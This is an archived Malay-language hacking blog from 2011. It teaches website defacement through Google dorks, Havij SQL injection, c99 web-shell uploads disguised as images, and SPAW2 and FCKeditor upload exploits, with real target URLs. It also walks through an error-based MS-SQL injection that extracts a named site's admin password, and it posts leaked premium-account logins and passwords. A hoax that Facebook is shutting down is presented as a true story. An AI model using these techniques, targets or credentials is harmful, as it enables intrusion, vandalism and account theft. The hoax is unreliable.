Saturday, 26 November 2011

free mobile internet for maxis only

1 - Dial *100#
2 - Pilih 7 (Internet & Settings) > Pilih 3 (Prepaid Broadband) > Pilih 8 (Tukar Profil/Service Switching) > Pilih 2 (Tukar kepada profil Broadband/Switch to Broadband) > Pilih 1 (Teruskan/Proceed)
3 - Tunggu beberapa ketika sehingga anda menerima SMS pengesahan
4 - Tetapkan proxy kepada 064.255.180.030.
5 - Tetapkan proxy port kepada 80.
6 - Download dan install aplikasi Opera Mini ini (yang telah diubahsuai) di telefon bimbit anda.
7 - Run Opera Mini yang telah di-install tadi. Pilih 'Custom1' dalam kolum 'Tricks'.
8 - Tukarkan 'Custom Server' kepada http://www.hotlink.com.my/​cgiproxy/nph-proxy.pl/000100A/​http/server4.
9 - Pilih 'OK'.
10 - Selesai!

Tetapan Proxy dan Proxy Port

(Nokia)
1 - Proxy : Settings > Connectivity > Destinations > Maxis 3G Internet > Options > Advanced Settings > Proxy Server Address.
2 - Proxy Port : Settings > Connectivity > Destinations > Maxis 3G Internet > Options > Advanced Settings > Proxy Port.

(Sony Ericsson)
Settings > Connectivity > Internet Settings > Maxis 3G Internet > Options > Edit > Proxy Settings > Tukar 'Proxy' kepada ON > Tukar 'Same for all servers' kepada ON > Proxy Servers > Di sini anda akan lihat 'Proxy address' dan 'Port'.

Thursday, 24 November 2011

test deface...

Assalamualaikum,pada kali ini saya akan tunjukkan cara bagaimana hendak mendefaced sesebuah laman web dengan menggunakan cara SQL Injection untuk mendapatkan admin password..baiklah,saya akan tunjukkan satu persatu caranya... Sebelum itu,kamu harus ada ilmu mengenai defaced,IP ADDRESS dan SQL Injection (PENTING!!):



APAKAH ITU DEFACED: Defaced ialah perbuatan merubah paparan utama sesebuah website.Paparan utama dipanggil shell.Shell ialah satu kode atau aturcara yang sudah diprogramkan dalam bentuk laman web untuk ditunjukkan kepada sesiapa yang melayari web tersebut.Defaced ialah satu kerja jahat (^_^) menggantikan kode asal kepada kode yang diinginkan oleh penggodam.Selepas kode itu digantikan,sesiapa sahaja yang melayari laman web itu akan melihat paparan yang diubah oleh penggodam.Untuk melakukan perkara ini,kamu harus mencipta satu shell dalam extension (".htm" atau ".html") ataupun anda boleh copy shell ini daripada laman web yang telah didefaced dan hanya menukar sedikit sahaja kandungan dalam shell itu.



APAKAH ITU SQL INJECTION:- SQL Injection ialah satu cara untuk kita memecah masuk pangkalan data (database) sesebuah website bertujuan mencuri data dan nama pengguna dan juga password.SQL Injection ialah kaedah memecah masuk yang paling berkesan sekali berbanding XXS Cross dan PHP Injection.Asalnya,SQL Injection harus dilakukan dengan cara manual iaitu memasukkan kode kedalam URL ataupun dipanggil UNION.Kode ini sangat susah dan ramai penggodam baru (newbies) tidak dapat menghafal kode ini secara menyeluruh.Tetapi,banyak tool yang telah direka bagi memudahkan penggodam memecah masuk pangkalan data.Antara alatan yang popular untuk melakukan SQL Injection ialah Havij dan SQLi Helper.



APAKAH ITU IP ADDRESS:- IP Address ialah pengenalan kepada komputer yang menggunakan Internet.IP address terdapat maklumat mengenai lokasi di mana sesebuah komputer bersambung kepada Internet.Ia sama seperti kad pengenalan,begitulah juga IP Address.



TOOL YANG HARUS KAMU ADA:-



(1).Havij 1.15 atau versi lain.. KEGUNAAN : Untuk melakukan SQL Injection ke sesebuah website DOWNLOAD LINK : www.mediafire.com/?mroimwseopfoc2w



(2).SUPER IP HIDE 3.0 atau versi lain.. KEGUNAAN : Untuk menyembunyikan IP kamu semasa kamu melakukan SQL Injection atau melogin sebagai ADMIN... DOWNLOAD LINK : www.mediafire.com/?dy02ygzntasteiv



(3).C99.PHP KEGUNAAN : Digunakan untuk merubah kode shell yang terdapat di dalam sesuatu website.. DOWNLOAD LINK : www.mediafire.com/?ko0hnzdoywt



Baiklah,itulah tool yang mesti kamu ada.Kedua-dua tool ini penting terutama SUPER IP HIDE kerana tool itu berfungsi menyembunyikan IP kamu.Kalau kamu tidah mempunya tool itu,kamu akan ditangkap kerana admin server itu mengesan kamu dengan mudah kerana kamu tidak menyembunyikan IP kamu.



Baiklah,sekarang kita mesti mencari laman web yang security lemah atau lebih dipanggil website yang vulneberity(dalam bahasa Inggeris) untuk dilakukan defacement.Terdapat langkah yang mudah untuk mencari website yang vuln(singkatan vulneberity).Iaitu menggunakan "google dork","google dork" ialah salah satu kemudahan diberi google untuk mencari website yang penting.Tetapi,kita boleh menyalahgunakan kelebihan itu untuk mencari website yang vuln.Caranya seperti begini:



(1).Buka "www.google.com"

(2).Taip salah satu kode di bawah ini

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()--

inurl:"id=" & intext:"Warning: mysql_fetch_array()---

inurl:"id=" & intext:"Warning: mysql_num_rows()----

inurl:"id=" & intext:"Warning: session_start()----

inurl:"id=" & intext:"Warning: getimagesize()-----

inurl:"id=" & intext:"Warning: is_writable()-------

inurl:"id=" & intext:"Warning: getimagesize()---

inurl:"id=" & intext:"Warning: Unknown()-----



(3).Tekan search

(4).Akan keluar beratus-ratus website yang vuln.

(5).Pilih salah satu.



Cuba buka laman yang anda pilih itu,anda pasti lihat error yang berlaku seperti "Warning: mysql_fetch_assoc()" atau "Warning: mysql_fetch_array()".Itu maknanya security website ini masih lemah dan berupaya untuk didefacedkan.Contohnya saya mendapat web seperti ini:-http://www.ypages.in/sell_offers.php?cid=28



Untuk kita mengdefaced laman web tersebut.Kita harus menyamar sebagai admin dan sebagai admin,tidak akan ada sekatan lagi untuk kita lakukan apa sahaja di website itu.Dan untuk mencari kata pengguna admin dan juga password,kita harus memecah masuk kedalam pangkalan data website berkenaan.Sebenarnya error yang kita cari sebentar tadi ialah pintu masuk kedua ataupun dipanggil "backdoor" dalam sesebuah website.Error tersebut akan memudahkan kita melakukan SQL Injection berbanding melakukan di page yang tidak mempunyai error.Antara alatan kesukaan saya untuk memecah masuk database ialah Havij,Havij sangat terkenal di kalangan penggodam kerana ia memudahkan kerja penggodam bagi melakukan SQL Injection.SEBELUM ANDA MEMULAKAN SQL INJECTION KE SESUATU WEBSITE.PASTIKAN ANDA SUDAH MENYEMBUNYIKAN IP ANDA KERANA APABILA ANDA MELAKUKAN SQL INJECTION,WEBSITE SERVER BOLEH MENGESAN IP ADDRESS ANDA.SAYA TIDAK AKAN BERTANGGUNGJAWAB SEKIRANYA ANDA DITANGKAP KERANA KECUAIAN ANDA.Caranya melakukan SQL Injection adalah seperti berikut



(1).Buka Havij

(2).Masukkan alamat website yang error sebentar lagi. Contoh : http://www.ypages.in/sell_offers.php?cid=28

(3).Tekan scan.

(4).Tunggu kerana Havij sedang melakukan SQL Injection ke dalam website berkenaan



Bila anda berjaya,Tables akan diunlockkan,di situ,anda boleh mencuri admin username dan password.TETAPI,jika anda tidak berjaya,cari target lain kerana website itu mungkin sudah diupgradekan pangkalan datanya dan sukar untuk kita memecah masuk pangkalan datanya.Dan apabila berjaya,pergi ke "Tables",di situ keluar fail yang mana fail itu ialah "DataBase".Katakanlah fail itu bernama "ID_INFORMATION",maka click pada kotak itu.Selepas itu tekan "Get Tables",ia akan mencari table yang wujud dalam database itu,selepas semua table sudah habis discan oleh Havij,cari nama tables yang merujuk nama username atau admin.Kerana kebiasaan di dalam table itulah kata nama dan kata laluan Admin disimpan.Jika anda melihat table yang aneh seperti "admin" atau "username_info"..click pada kotak itu,selepas itu,tekan "Get Colums"..ia akan muncul fail-fail yang mungkin menyimpan data bagi admin username dan password..andainya terdapat dua colum iaitu "username" dan "password"..click pada kedua-dua fail tersebut..click "Get Data"..ia akan keluar username dan password...itulah username dengan password admin..tetapi,andai jika anda scan,terdapat banyak username dengan password yang keluar,pilih username yang tertulis admin..itulah username dan password admin yang sebenar..Tetapi,andai kata nama admin muncul,tetapi passwordnya dalam bentuk yang pelik.Iaitu password yang mempunyai 32 huruf.Itu adakah password hash.Ia telah dihashkan bagi menyukarkan penggodam mendapat password yang benar-benar betul.Contohnya passwordnya dalam bentuk begini



Contoh Password:- 098F6BCD4621D373CADE4E832627B4F6



Ini dipanggil MD5 hash.MD5 hash sangat terkenal sekali kerana banyak digunakan oleh web server bagi menyembunyikan password mereka walaupun database mereke dipecah masuk oleh penggodam.Password itu telah dihashkan begini:



Contoh:- test (password sebenar) ---------> 098F6BCD4621D373CADE4E832627B4F6 (telah dihashkan)



Tetapi,tidak mengapa.Di dalam Havij,terdapat tool yang membolehkan kita memecah password hash itu.Begini caranya:



(1).Buka Havij

(2).Pergi ke "MD5"

(3).Masukkan hash MD5 tadi.

(4).Tekan "start"

(5).Lihat passwordnya.



Tetapi,jika kamu tidak berjaya ataupun failed dalam memecahkan password itu.Mungkin terdapat beberapa sebab.Mungkin MD5 itu telah dihashkan dalam bentuk AES-256.AES-256 ialah bentuk penyimpan password security yang paling selamat dan sukar dihash.Ia hanya boleh dihash menggunakan tool "Cain and Abel".Kedua,mungkin password asal yang belum dihash itu terdapat dalam digit yang panjang,seperti contoh yang saya tunjuk tadi iaitu "test".Ia hanya 4 digit,password yang senang untuk dicrack ialah 8 digit sahaja.Itu pun bergantung kepada security MD5 itu.Jika password asal digitnya lebih daripada 9.Ia sukar dihash dan hanya boleh dihash dengan menggunakan Rainbow Table.Rainbow table ialah satu "table" yang digunakan oleh "Cain and Abel" untuk menggunakan kaedah cryptology untuk memecah kod tersebut.Rainbow Table boleh didownload tetapi saiznya di luar jangkaan kita,iaitu 50-300 GB.Kita juga boleh menghasilkan sendiri Rainbow Table tetapi ia mengambil masa sehingga 10 tahun untuk siap.Ketiga,mungkin hash tersebut bukan MD5,mungkin MD2 atau MD4.Terdapat banyak hash yang ada sekarang.Kalau kamu mempunyai masalah password dalam bentuk MD5 hash.Saya sarankan kamu mengambil target lain kerana kita akan membuang masa sahaja untuk memecah password itu melainkan itu website yang sudah kamu target sejak dahulu sekali.Saya tidak akan menghalang kamu.Sekarang kita kembali ke agenda kita,iaitu mendefacedkan website.



Sekarang tugas sebenar ialah mendefaced laman web berkenaan.Perkara pertama ialah kamu harus memecah masuk ke dalam admin website itu dengan menggunakan username dan password yang kamu dapat semasa melakukan SQL Injection.Kebiasaan,untuk melogin kedalam website,anda harus menambah "/admin" kebelakang nama website tersebut.Contohnya:



-www.example.com/admin



Tetapi,jika page itu tidak wujud.Maka admin login page mungkin telah disembunyikan dengan nama yang lain selain admin.Andai berlaku kejadian itu,Havij ialah alat yang sempurna sekali untuk mengesan admin login page yang terdapat dalam laman web berkenaan.Caranya begini:



(1).Pergi ke Find Admin

(2).Masukkan laman web berkenaan (Contohnya:www.example.com)

(3).Tekan start.Ia akan mula mencari admin login page dalam laman web berkenaan

(4).Bila sudah habis scan,buka URL berkenaan



Masukkan username dengan password.Bila berjaya masuk,anda berupaya melihat segala fail sulit atau e-mail sulit yang terdapat dalam website berkenaan.Tetapi,tujuan kita ialah mendefaced,jadi kita beralih kepada agenda kita.Untuk mendefaced,seperti saya sebutkan sebentar tadi,kita gunakan shell "c99.php" sebagai shell utama kita hendak mendefaced web berkenaan.Cari apa-apa yang ditulis dalam website berkenaan upload.Jika terdapat butang yang membolehkan kita mengupload shell,ia akan memudahkan kerja kita.Tetapi,jika tak terdapat butang yang membenarkan kita mengupload shell.Kita harus "menipu" laman web berkenaan.Cari lagi butang yang membolehkan kita menguploadkan fail,selalunya admin hanya dibenarkan mengupload gambar sahaja.Tetapi,tidak mengapa.Rename kembali shell "c99.php" anda kepada "c99.php.gif".Ini akan menipu laman web berkenaan kerana laman web berkenaan akan menganggap kita cuma mengupload gambar sahaja tetapi kita sudah mengupload shell ke website berkenaan.Buka shell berkenaan,contohnya:



www.example.com/c99.php.gif (mengikut kepada apa extension yang anda tukar)



Bila anda buka c99.php,ia akan keluar satu page yang membolehkan kita mengawal web itu lebih daripada admin tersebut.Ia membolehkan kita mengedit,menukar dan memadam shell yang terdapat dalam website berkenaan.Tujuan kita adalah mengdefaced website berkenaan.Oleh itu,kita akan mengedit shell yang terdapat dalam website itu.Cari apa-apa shell yang mungkin bernama "index.php" atau "main.php".Cari apa-apa sahaja shell yang mungkin paparan utama website berkenaan.Contohnya,"index.php" ialah paparan utama yang keluar apabila kita membuka website berkenaan.Jadi,shell itulah yang kita akan edit.Tekan pada "index.php" berkenaan.Akan keluar kode yang terdapat dalam shell itu,padam semua kode itu,gantikannya dengan kode shell kita.Tekan save.Sekarang.Anda telah berjaya.Cuba taip website itu untuk melihat ia berjaya atau tidak.Kalau ia berjaya,ia akan keluar paparan yang kita sudah programkan ke dalam wesite itu....

Deface Tutorial [spaw2 vuln]

Dork:

inurl:"spaw2/dialogs/"

inurl:"spaw2/uploads/files/"



Exploit:

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9&type=files



1. Guna dork di atas utk mencari website yg vulnerable dgn teknik ni..2. Korang akan jumpa mcam ni

"Index of/ spaw2/dialogs/"

atau

"site.com/abc/spaw2/uploads/files/aaaa/aaaa.pdf"



3. Sekarang tukar spaw2/uploads/files/aaaa/aaaa.pdf dengan exploitnya.. spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da752d9 8cac9&type=files



4. Lepas tuh, bleh la korang nk upload deface page or shell korang..



Contoh:



selepas guna dork tuh, aku jumpa website ni



http://kasht.com.ua/spaw2/dialogs/



aku nak upload aku punya file, aku tukar je la url tuh jadi mcam ni



http://kasht.com.ua/spaw2/dialogs/​dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da752d9%20​8cac9&type=files







kalau korang nk upload deface page, klik dkat box atas tuh & pilih files..

lpas tuh upload la deface page korang..

direktori deface page korang kat sini



http://kasht.com.ua/spaw2/uploads/files/namefilekorang.html





kalau korang nk upload shell atau petronas, rename biar dia jadi mcam ni

nameshellataupetronas.php;.jpg

pastu kat box atas tuh korang pilih images

dan shell korang akan ade kat sini



http://kasht.com.ua/spaw2/uploads/images/nameshellataupetronas.php;.jpg



itu saja la tutorial utk hari ni..harap2 korang faham yer..

FCKeditor..

Assalamualaikum semua , cara-2 mendeface website senag sahaja , caranya mudah saja .

caranya seperti berikut .

===================================================================================================



deface menggunakan file.html



dork : :Powered by Opencart site:.com





[+] exploit : /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html



msukan dork digoogle..

cari satu persatu web yg msih punya bug (belum di patch)



terus msukan exploitnya..

contoh :

www.situstarget.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html





-ganti connector : ASP ke PHP

-pilih file

-upload



okay , macam mana dengan pencarian website target ?

kalau sudah jumpa ,

tambah dibelakangnya seperti berikut:



www.situstarget.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/FileKamu.html

jadi :

www.situstarget.com/NamaFileKorang.html

enter.....

selesai :D



Pastikan cari site yg belakang nye mcm ni...---->www.example.com *.com*

Step-by-Step SQL Injection

Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.
Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box. Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang biarkan aja): ‘ having 1=1–
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.NOMOR’ is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
‘ group by T_ADMIN.NOMOR having 1=1–
Akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.NIP’ is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1–
Akan keluar pesan error:
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘T_ADMIN.PASSWORD’ is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
——————–
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
‘ group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1–
(catatan : kalimat harus 1 baris, tidak dipotong)
——————–
- NIP atau Password atau Unit Anda salah !! -
——————–
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
‘ union select sum(NOMOR) from T_ADMIN–
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
——————–
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
‘ union select sum(NIP) from T_ADMIN–
Akan keluar pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
——————–
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
‘ union select sum(nama_kolom) from T_ADMIN–
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
‘ union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > ‘a’–
artinya kita memilih minimum nama user yang lebih besar dari ‘a’
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
——————–
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value ‘bill ‘ to
a column of data type int.
/sipm/admin/dologin.asp, line 7
——————–
Anda lihat :
varchar value ‘bill ‘
‘bill’ itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
‘ union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = ‘bill’–
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
———————
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value ‘m@mpusk@u’ to a
column of data type int.
/sipm/admin/dologin.asp, line 7
———————
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja….

Kita inject-kan :
‘ union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA =’bill’–
catatan : harus satu baris.
Duarrrrrr……….
Glhodhak………….
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119′ having 1=1–
akan keluar pesan error :
—————————
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
‘tb_news.NewsId’ is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
—————————
artinya ‘tb_news.NewsId’ itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.

******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah “Startup and run SQL Server” menggunakan low privilege user
di SQL Server Security tab.

Wednesday, 23 November 2011

Premium Today

##########

FileSonic Premium Accounts 24-11-2011
##########################

michaelsuchanek@yahoo.com: pancreas
sector_no_limits@hotmail.fr: marion
moloney@mixrelease.com: mixrelease.com

Uploading
##########################

tobe913@aol.com : 87272787
alibooms@hotmail.com : 123654
chapearson@gmail.com : chance
davidhawk@aol.com : wishbone
contact@bandkmanagement.com : Viper1
jmgabo@orange.fr : 98529852
gynochou@hotmail.com : linalina
tommyhav@yahoo.com : skippy

Wupload
##########################
kancapka@tlen.pl : unplonas
unplona : unplonas

crocko.com
##########################

Cotton Candy USB with Dual-Core Computer can turns Any Screen Into an Android Station

Norwegian company FXI Technologies has been showing a USB stick-sized portable computer prototype, featuring with a dual-core 1.2-GHz CPU, 802.11n Wi-Fi, Bluetooth, HDMI-out and a microSD card slot for memory.

Codenamed Cotton Candy because its 21 gram weight is the same as a bag of the confection, the tiny PC enables what its inventor calls “Any Screen Computing,” the ability to turn any TV, laptop, phone, tablet, or set-top box into a dumb terminal for its Android operating system.

The Cotton Candy has a USB 2.0 connector on one end and an HDMI jack on the other. When connected to an HDTV, it uses the HDMI port for video, the USB for power, and Bluetooth to connect to a keyboard, mouse, or tablet for controlling the operating system. The device can output up to 1080p so even a full HD screen can display the Candy’s preloaded Android 2.3 operating system at its native resolution. The dual core CPU can even play local 1080p video or stream HD clips from the internet.
The idea behind it is similar to that of FXI’s Cotton Candy, in the sense that you will need to boot Android from a USB stick. Alternatively you could use an SD card as well. They’ve managed to get just about everything up and running, including Android Market, but it seems that the majority of users who managed to get this running successfully have been owners of ASUS branded PCs, although we can’t be sure of the reason behind that particular phenomenon.

For more information about the Android-x86 project, or if you’re looking for a way to load up Android’s Honeycomb 3.2 onto your laptop or PC, head on down to Android-x86’s website for the details. In the meantime you can check out this guy who managed to load Honeycomb 3.2 onto his ASUS Eee PC.

From developers to students to mobile workers, there are a number of groups that could find innovative ways to use a computer the size of a USB stick. However, you won’t see a consumer product shipping anytime soon from FXI. The company plans to sell the Cotton Candy to developers and let OEMs license the technology and turn it into something that can appeal to a wide audience.

Hackers destroyed a pump used by a US water utility

Hackers destroyed a pump used by a US water utility after gaining unauthorized access to the industrial control system it used to operate its machinery. Five computer screenshots posted early Friday purport to show the user interface used to monitor and control equipment at the Water and Sewer Department for the City of South Houston, Texas.

''This is arguably the first case where we have had a hack of critical infrastructure from outside the United States that caused damage,'' a managing partner at Applied Control Solutions, Joseph Weiss, said.

The network breach was exposed after cyber intruders burned out a pump. ''No one realised the hackers were in there until they started turning on and off the pump,'' he said.

It said hackers apparently broke into a software company's database and retrieved usernames and passwords of various control systems that run water plant computer equipment.Using that data, they were able to hack into the Illinois plant.

The U.S. Department of Homeland Security and the Federal Bureau of Investigation are examining the matter, said DHS spokesman Peter Boogaard.

"At this time there is no credible corroborated data that indicates a risk to critical infrastructure entities or a threat to public safety," he said, declining to elaborate further. An FBI spokesman in Illinois did not return phone calls seeking comment.

Tuesday, 22 November 2011

Soalan Bangang Yang Buat Orang Lagi Bengang !! Ggrrrrrr !!

1)Bila orang nampak anda baring tutup mata....
Soalan: Hyee! tidur ke?
Jawapan: Tak la,aku training mcm mana nak mati nanti...

2)Imagine anda bawa tv anda yang rosak gi jumpa technician untuk repair,dia mesti tanya gak:
Soalan: Nak repair tv ke?
Jawapan: Tak la,aku bosan! so sje aku bwk tv ni jln2.

3)Time anda bangun tidur, dan terus si bendul tu mesti tanya anda:
Soalan: Hyep! da bangun?
Jawapan: Ish,aku tengah tido sambil berjalan-jalan...

4)Kawan anda call phone umah anda dan...
Soalan: Hello?.. ko mana ?
Jawapan: Kat sini haa ,kat lam gua

5)Diorg nampak anda keluar dari bilik mandi dan dalam keadaan basah-basah..
Soalan: Eh baru mandi ke?
Jawapan: Ehh! Mana ada , Aku jatuh dalam lubang jamban tadi!!!

6)Anda di dalam toilet , pintu berkunci , ada gak orang ketuk pintu dan tanya anda..
Soalan: Ada orang tak?
Jawapan: Mana ada orang!! Taik yang bercakap ni!!












Premium Today Special



Wupload Premium Accounts Working Until 16 January 2012
##############################​#######
User : jjliii10@yahoo.com
Pass : born1980
Premium Membership Valid Until 16 January 2012

User : bartleby2k3@yahoo.com
Pass : loki6k
Premium Membership Valid Until 14 December 2011

User : syzahmed@yahoo.com
Pass : zxc123
Premium Membership Valid Until 06 January 2012

Filesonic Premium Accounts 22-11-2011
#########################
User : greg444477345@yahoo.com
Pass : vezz4444
Premium Membership Valid Until 22-11-2011

User : roro3@yahoo.com
Pass : 666
Premium Membership Valid Until 22-12-2011

User : maramiga45@hotmail.com
Pass : marjonne50
Premium Membership Valid Until 22-12-2011

User : premyou115
Pass : premium4you.org
Premium Membership Valid Until 23-11-2011

Sunday, 20 November 2011

Facebook Akan Ditutup Pada March 2012 - Cerita Benar

Facebook akan ditutup pada March 2012.. huhu.. Abis la.. sape yang ramai kawan tu tak leh nak buat ape.. nak access akaun pun dah tak boleh.. Mark Zurkerberg dah pening kepala nak handle.. So camne nak buat sekarang.. Ade sape2 nak beli Facebook.com? hikhik.. tak de la.. pasni main la balik Tagged, MySpace, Friendster, Ning ke ape ke.. u all punye suka la.. Baca la berita kat bawah tu.. kalau tak faham translate kat google.. atau gi kat HowtoSay.org.. Layaaan...

PALO ALTO, CA –Mark Zuckerberg announced that Facebook will be shut down in March of 2012. Managing the site has become too stressful.


“Facebook has gotten out of control,” said Zuckerberg in a press conference outside his Palo Alto office, “and the stress of managing this company has ruined my life. I need to put an end to all the madness.”


Zuckerberg went on to explain that starting March 15th of next year, users will no longer be able to access their Facebook accounts. That gives users (and Facebook addicts) a year to adjust to life without Facebook.


“After March 15th, 2012 the whole website shuts down,” said Avrat Humarthi, Vice President of Technical Affairs at Facebook. “So if you ever want to see your pictures again, I recommend you take them off the internet. You won’t be able to get them back after Facebook goes out of business.”


Zuckerberg said the decision to shut down Facebook was difficult, but that he does not think people will be upset.


